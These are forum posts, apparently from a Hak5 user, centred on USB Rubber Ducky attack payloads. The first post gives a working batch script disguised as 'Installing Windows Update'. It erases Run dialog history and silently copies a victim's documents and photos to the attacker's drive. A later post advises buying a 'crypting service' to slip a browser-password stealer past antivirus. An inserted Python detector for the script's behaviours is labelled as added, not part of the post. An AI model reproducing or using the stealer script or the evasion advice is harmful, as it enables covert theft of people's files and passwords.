Posts posted by felipe

  1. Need help here... It will steal all pdf, doc, docx, jpeg, jpg from %USERPROFILE%?

    e.cmd

    @echo off
    @echo Installing Windows Update

    REM Delete registry keys storing Run dialog history
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

    REM Creates directory comprised of computer name, date and time
    REM %~d0 = drive letter of this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
    set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
    mkdir %dst% >>nul

    if Exist %USERPROFILE%\Documents (
    REM /C Continues copying even if errors occur.
    REM /Q Does not display file names while copying.
    REM /G Allows the copying of encrypted files to destination that does not support encryption.
    REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
    REM /E Copies directories and subdirectories, including empty ones.

    REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

    REM Same as above but does not create empty directories
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul
    )

    REM Blink CAPSLOCK key
    start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

    @cls
    @exit
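
A defender-side check for the behaviours in the script above, as an added example that is not part of the original post: it groups process-creation command lines by parent process and flags a parent that copies document types out of a Documents folder to a different drive alongside RunMRU deletion or a hidden-window SendKeys call. The event fields (`host`, `ppid`, `cmd`) and the sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns for the three behaviours visible in e.cmd, matched against fully
# expanded command lines as process-creation logging would record them.
RUNMRU = re.compile(r"\breg(?:\.exe)?\s+delete\s+\S*\\Explorer\\RunMRU\b", re.I)
XCOPY = re.compile(
    r"\bxcopy(?:\.exe)?\s.*?\b([a-z]):\\\S*\\Documents\\\*\.(pdf|docx?|jpe?g)\s+([a-z]):\\",
    re.I)
SENDKEYS = re.compile(r"\bpowershell(?:\.exe)?\s.*-WindowStyle\s+Hidden.*SendKeys", re.I)

# Constructed sample events (assumed field names: host, ppid, cmd).
SAMPLE = [
    {"host": "WS01", "ppid": 4120,
     "cmd": r"REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"},
    {"host": "WS01", "ppid": 4120,
     "cmd": r"xcopy /C /Q /G /Y /S C:\Users\alice\Documents\*.pdf E:\slurp\WS01_20240105_101500"},
    {"host": "WS01", "ppid": 4120,
     "cmd": r"xcopy /C /Q /G /Y /S C:\Users\alice\Documents\*.docx E:\slurp\WS01_20240105_101500"},
    # Same-drive copy: ordinary backup, must not be flagged.
    {"host": "WS02", "ppid": 900,
     "cmd": r"xcopy /S /Y C:\Users\bob\Documents\*.pdf C:\Backup\bob"},
    # History cleanup with no document copy: must not be flagged on its own.
    {"host": "WS03", "ppid": 77,
     "cmd": r"reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"},
]

def detect(events):
    """Return {(host, ppid): finding} for parents that copied documents to
    another drive and also showed at least one companion behaviour."""
    seen = defaultdict(lambda: {"exts": set(), "drives": set(), "extras": set()})
    for ev in events:
        s = seen[(ev["host"], ev["ppid"])]
        m = XCOPY.search(ev["cmd"])
        if m and m.group(1).lower() != m.group(3).lower():
            s["exts"].add(m.group(2).lower())     # which file types left
            s["drives"].add(m.group(3).upper())   # which drive received them
        if RUNMRU.search(ev["cmd"]):
            s["extras"].add("runmru_delete")
        if SENDKEYS.search(ev["cmd"]):
            s["extras"].add("hidden_sendkeys")
    return {k: v for k, v in seen.items() if v["exts"] and v["extras"]}

if __name__ == "__main__":
    print(detect(SAMPLE))
```

The path pattern assumes no spaces in the source path, matching how the unquoted script itself would be expanded.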

  2. 6 hours ago, Eanske said:

    Is there no other option than that? I mean if something gets crypted by a third party there is no way of knowing if they injected anything else in there..

    I mean I know this is already the case with the file but I do find the official hak5 github to be a bit more trustworthy than that..

    Also isn't crypting or owning a crypter illegal in the EU?

    What is illegal for you? Running a pendrive to grab passwords, or a crypter service?

    I don't know about the EU, I'm from Brazil... So, about another way? I don't know, sorry =/

    Of course everything in hak5 is trustworthy, and if it has that possibility, it would be perfect.

    Anyway... I hope I've helped. And sorry for my bad English.

  3. 2 hours ago, Eanske said:

    Hi, I'm new here so forgive me if I step on anybody's toes right now with my ignorance..

    But I have a question, I've been wanting to try this Ducky script right here https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Export-Browser-Passwords-and-email-results

    The only problem I seem to be having right now, is that the file that has to be downloaded, bpd.exe, is flagged immediately, and even 31 out of 50 antiviruses will notice and delete it..

    Even smartscreen will block it.

    So are we supposed to encode that file first or something?  Is there an online tool for that around here?

    Otherwise I don't see how that script can be successful...

    Buy a "Crypting Service" for you... Google: Crypting Service

    or go around like hackforums and others.

    And before purchasing some shit, read about scantime, runtime, dependencies etc...

     

  4. I am experiencing exactly the problem that you have mentioned about the support of hak5.

    My order is: #92373, purchased rubber duck 16/12.

    I know, it's backordered... but I asked about updating personal info (like full name and tax ID)... I haven't seen any field asking for my tax ID, and that matters a lot for Brazil.

    And now I've got another question: is it possible for the Rubber Ducky to come with Duck Twin Exfiltration files working on (pt-br)?

    Sorry for my bad English, and thanks a lot.

    Merry Christmas for all
